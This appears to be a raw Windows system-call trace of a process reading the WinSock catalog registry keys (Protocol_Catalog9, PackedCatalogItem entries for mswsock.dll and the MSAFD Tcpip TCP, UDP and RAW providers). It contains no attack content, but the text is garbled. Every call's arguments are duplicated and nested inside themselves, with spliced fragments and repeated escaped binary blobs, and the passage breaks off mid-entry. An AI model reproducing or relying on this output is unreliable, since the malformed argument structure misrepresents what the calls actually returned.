 00545   748   NtQueryValueKey  (64,  (64, "WinSock_Registry_Version", Partial, 144, ... TitleIdx=0, Type=1, Data="2\0.\00\0\0\0"}, 20, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (64, "WinSock_Registry_Version", Partial, 144, ... TitleIdx=0, Type=1, Data="2\0.\00\0\0\0"}, 20, ) }, 20, ) == 0x0
 00546   748   NtCreateEvent  (0x1f0003, 0x0, 0, 0, ... 68, ) == 0x0
 00547   748   NtOpenKey  (0x2000000, {24, 64, 0x40, 0, 0,  (0x2000000, {24, 64, 0x40, 0, 0, "Protocol_Catalog9"}, ... 72, ) }, ... 72, ) == 0x0
 00548   748   NtQueryValueKey  (72,  (72, "Serial_Access_Num", Partial, 144, ... TitleIdx=0, Type=4, Data="\15\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (72, "Serial_Access_Num", Partial, 144, ... TitleIdx=0, Type=4, Data="\15\0\0\0"}, 16, ) }, 16, ) == 0x0
 00549   748   NtNotifyChangeKey  (72, 68, 0, 0, 2011455960, 1, 0, 0, 0, 1, ... ) == 0x103
 00550   748   NtQueryValueKey  (72,  (72, "Serial_Access_Num", Partial, 144, ... TitleIdx=0, Type=4, Data="\15\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (72, "Serial_Access_Num", Partial, 144, ... TitleIdx=0, Type=4, Data="\15\0\0\0"}, 16, ) }, 16, ) == 0x0
 00551   748   NtOpenKey  (0x2000000, {24, 72, 0x40, 0, 0,  (0x2000000, {24, 72, 0x40, 0, 0, "0000000D"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00552   748   NtQueryValueKey  (72,  (72, "Next_Catalog_Entry_ID", Partial, 144, ... TitleIdx=0, Type=4, Data="#\4\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (72, "Next_Catalog_Entry_ID", Partial, 144, ... TitleIdx=0, Type=4, Data="#\4\0\0"}, 16, ) }, 16, ) == 0x0
 00553   748   NtQueryValueKey  (72,  (72, "Num_Catalog_Entries", Partial, 144, ... TitleIdx=0, Type=4, Data="\26\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (72, "Num_Catalog_Entries", Partial, 144, ... TitleIdx=0, Type=4, Data="\26\0\0\0"}, 16, ) }, 16, ) == 0x0
 00554   748   NtOpenKey  (0x2000000, {24, 72, 0x40, 0, 0,  (0x2000000, {24, 72, 0x40, 0, 0, "Catalog_Entries"}, ... 76, ) }, ... 76, ) == 0x0
 00555   748   NtOpenKey  (0x20019, {24, 76, 0x40, 0, 0,  (0x20019, {24, 76, 0x40, 0, 0, "000000000001"}, ... 80, ) }, ... 80, ) == 0x0
 00556   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 00557   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 00558   748   NtAllocateVirtualMemory  (-1, 1343488, 0, 4096, 4096, 4, ... 1343488, 4096, ) == 0x0
 00559   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5f\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0\240\32\17\347\213\253\317\21\214\243\0\200_H\241\222\351\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\1\0\0\0\6\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0T\0c\0p\0i\0p\0 \0[\0T\0C\0P\0/\0I\0P\0]\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\204\3\0\00\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\00\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\01\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\02\01\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\02\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\02\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\03\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5f\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0\240\32\17\347\213\253\317\21\214\243\0\200_H\241\222\351\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\1\0\0\0\6\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0T\0c\0p\0i\0p\0 \0[\0T\0C\0P\0/\0I\0P\0]\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\204\3\0\00\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\00\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\01\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\02\01\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\02\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\02\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\03\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\02\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\03\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0 (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5f\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0\240\32\17\347\213\253\317\21\214\243\0\200_H\241\222\351\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\1\0\0\0\6\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0T\0c\0p\0i\0p\0 \0[\0T\0C\0P\0/\0I\0P\0]\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\204\3\0\00\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\00\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\01\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\02\01\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\02\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\02\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\03\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0
 00560   748   NtClose  (80, ... ) == 0x0
 00561   748   NtOpenKey  (0x20019, {24, 76, 0x40, 0, 0,  (0x20019, {24, 76, 0x40, 0, 0, "000000000002"}, ... 80, ) }, ... 80, ) == 0x0
 00562   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 00563   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 00564   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\6\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0\240\32\17\347\213\253\317\21\214\243\0\200_H\241\222\352\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\2\0\0\0\21\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\273\377\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0T\0c\0p\0i\0p\0 \0[\0U\0D\0P\0/\0I\0P\0]\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\204\3\0\05\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\05\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\06\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\03\06\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\07\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\07\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\08\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\6\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0\240\32\17\347\213\253\317\21\214\243\0\200_H\241\222\352\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\2\0\0\0\21\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\273\377\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0T\0c\0p\0i\0p\0 \0[\0U\0D\0P\0/\0I\0P\0]\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\204\3\0\05\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\05\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\06\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\03\06\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\07\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\07\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\08\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\07\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\08\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0 (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\6\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0\240\32\17\347\213\253\317\21\214\243\0\200_H\241\222\352\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\2\0\0\0\21\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\273\377\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0T\0c\0p\0i\0p\0 \0[\0U\0D\0P\0/\0I\0P\0]\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\204\3\0\05\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\05\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\06\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\03\06\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\07\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\07\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\08\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0
 00565   748   NtClose  (80, ... ) == 0x0
 00566   748   NtOpenKey  (0x20019, {24, 76, 0x40, 0, 0,  (0x20019, {24, 76, 0x40, 0, 0, "000000000003"}, ... 80, ) }, ... 80, ) == 0x0
 00567   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 00568   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 00569   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\6\2\0\0\0\0\0\0\0\0\0\0\0\0\0\14\0\0\0\240\32\17\347\213\253\317\21\214\243\0\200_H\241\222\353\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\3\0\0\0\0\0\0\0\377\0\0\0\0\0\0\0\0\0\0\0\273\377\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0T\0c\0p\0i\0p\0 \0[\0R\0A\0W\0/\0I\0P\0]\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\204\3\0\0:\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0:\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0;\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\04\0;\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0<\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0<\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0=\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\6\2\0\0\0\0\0\0\0\0\0\0\0\0\0\14\0\0\0\240\32\17\347\213\253\317\21\214\243\0\200_H\241\222\353\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\3\0\0\0\0\0\0\0\377\0\0\0\0\0\0\0\0\0\0\0\273\377\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0T\0c\0p\0i\0p\0 